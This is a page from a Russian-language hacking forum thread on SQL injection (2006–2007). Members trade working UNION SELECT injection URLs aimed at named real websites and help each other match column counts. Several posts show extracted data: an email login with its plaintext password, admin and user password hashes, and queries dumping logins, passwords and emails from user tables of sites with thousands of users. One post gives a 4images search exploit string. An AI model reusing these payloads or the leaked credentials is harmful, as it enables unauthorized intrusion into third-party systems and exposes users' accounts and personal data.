SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    E-Disc.ru
    больше 5к юзеров


    http://e-disc.ru/details.php?Id=-1+union+select+1,2,3,lastname,5,pwd,7,8,9,10,11,12,13,14,country,16,17,18,city,20,21,22,23,24,25,26,email+from+users+limit+5000,5001/*

    пароли к лич.каб на сайте не подходят, но у многих стоит у мыла тот же пароль. [email protected]:13011973 например...



    2 терминал
    http://mp3zzz.ru/alb/3-1 == http://mp3zzz.ru/alb/2
    скуля вроде есть, но колонки подобрать не могу=\..
     
    #421 InferNo23, 7 Feb 2007
    Last edited: 7 Feb 2007
  2. Schooly_D

    Schooly_D Banned

    Joined:
    30 Jun 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    http://www.danpal.dk/index.php?doc=99999+union+select+1,2,3,4,5/*
     
    1 person likes this.
  3. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.vanta.ru/script/catalog.php?cat=2+union+select+1,user(),3,database(),5,6,7,8,9,10/*&clas=2
     
    1 person likes this.
  4. Lancellot

    Lancellot Member

    Joined:
    9 Aug 2006
    Messages:
    138
    Likes Received:
    23
    Reputations:
    7
    http://www2.avis.it/usr_view.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51/*

    не могу подобрать
     
  5. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,3,4,5,6,7/*
    \\\
    http://www.volgagis.ru/web/editweb.php?id=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),7,8,9,10,11,12,13/*
    люди пишут сайты)))
    одна из их "работ"
    http://news.ivolga.ru/index.php?idnews=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16/*&r=0&rn=0
    интересно, что они курят...
    http://www.sbbs.ru/news/index.php?id=999999999999+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16/*
     
    #425 Termin@L, 7 Feb 2007
    Last edited: 7 Feb 2007
  6. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Code:
    http://www.sport.com.ua/vote.phtml?id=-1+union+select+concat(username,char(58),password),2+from+users/*
    maxim:91c0a0fbe2633617b9400c60ba9e0127

    Code:
    http://kava.lviv.ua/event/index.php?id=-1+union+select+login,password,3+from+admin/*
    admin:de6d357c726f1d42c63b00ef18fc0d3f

    Code:
    http://www.untp.kiev.ua/index.php?id=-1+union+select+1,2,3,4,5,7/*
    Code:
    http://www.wrs.com.ua/?id=-1+union+select+1,2/*
     
    1 person likes this.
  7. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    http://www.onconference.ru/conferences/index.html?id=
    http://www.promved.ru/articles/article.phtml?id=1005&nomer=9999+union+select+1,2,3,4/*
    http://www.uprava.org/section.php?id=-99+union+select+1,2,3,4,6,7,8/*
     
    1 person likes this.
  8. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    _http://www.promdesign.com.ua/forum.html?level=3&pid='
    _http://whoiswho.crimea.ua/result_s.php
    _http://infoprom.com.ua/catalog.php?id=5'ion_id=&letter=&by=30&page=3
    _http://www.boiko.com.ua/index.php?pname=childrens_home&p2=6'
     
    2 people like this.
  9. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    http://forum.siemens-club.ru/viewboard.php?BoardID=-29%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10/*

    Подобрать не могу :(
     
    1 person likes this.
  10. Lancellot

    Lancellot Member

    Joined:
    9 Aug 2006
    Messages:
    138
    Likes Received:
    23
    Reputations:
    7
    SQL -ihj в 4 images
    вот сплойт
    Code:
    <target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20
    user_password%20from%204images_users%20where%20user_name=%2527ADMIN
    
    вот сайт:http://www.sashapivovarova.com/galleryfans

    подстовляю сплойт и ничего не происходит
     
  11. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    что-то у меня ничего не получается сегодня - неудачные скули, количество подобрал, а селект запрещен, а третий линк просто улыбнул
    Code:
    http://www.synergisticresearch.com/index.php?PageID=6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    
    http://www.e-financialconsulting.com/index.php?p=user&id=-4+union+select+1,2,3,4/*
    
    http://digitalfx.ru/index.php?newsid=1146316404'
    
     
  12. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Вай селект запрещён?:
    http://www.synergisticresearch.com/index.php?PageID=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,user()/*

    а http://www.e-financialconsulting.com 4ё-то у меня не грузится вообще =\
     
  13. GoNZo

    GoNZo New Member

    Joined:
    17 Nov 2006
    Messages:
    13
    Likes Received:
    4
    Reputations:
    -1
    Чет немогу понять :/
    http://www.nybmwcca.org/events.php?id=-29%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10/*
    а вот это ваще хрень
    http://www.nybmwcca.org/events.php?id=1+union+select+concat(user,char(58),password)+from%20+mysql.user/*
     
  14. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    хм...я как-то так делал что оно мне говорило

    Юзеру такому-то запрешен СЕЛЕКТ с базы.

    http://www.synergisticresearch.com/

    У тебя конструкция concat(user(),char(58),password()) прошла?
     
  15. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    _http://www.fhm.com.ua/hospital/?numid=5'
    _http://www.fenix.com.ua/pub/view_3x6.php?id=99+union+select+%205,16,17,18,user(1)/*
    _http://www.vitrenko.org/start.php?lang=1&part_id=6'
    _http://www.nasheradio.net/news2.php?id=22'
    _http://bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=224'
     
  16. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    не выкладывай плиз инъекции где нельзя выводить полезную инфу (юзер,пасс), а то и так перебирать много :)
     
  17. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    UPTIME.ru

    UpTime.ru

    8000 юзеров..

    http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,email,6,icq,8,9,10,11,12+from+users+limit+8200,8201/*
     
    1 person likes this.
  18. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Хостинг RussWeb.ru

    http://www.russweb.ru/index.php?sn=rbc47&plan_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
     
    #438 InferNo23, 9 Feb 2007
    Last edited: 9 Feb 2007
    1 person likes this.
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
     
  20. TAKEP

    TAKEP New Member

    Joined:
    2 Feb 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    http://www.divo-ostrov.ru/rus/actions/fotoactions_index.php?id=BENCHMARK(1000000,MD5(NOW()))
     
Thread Status:
Not open for further replies.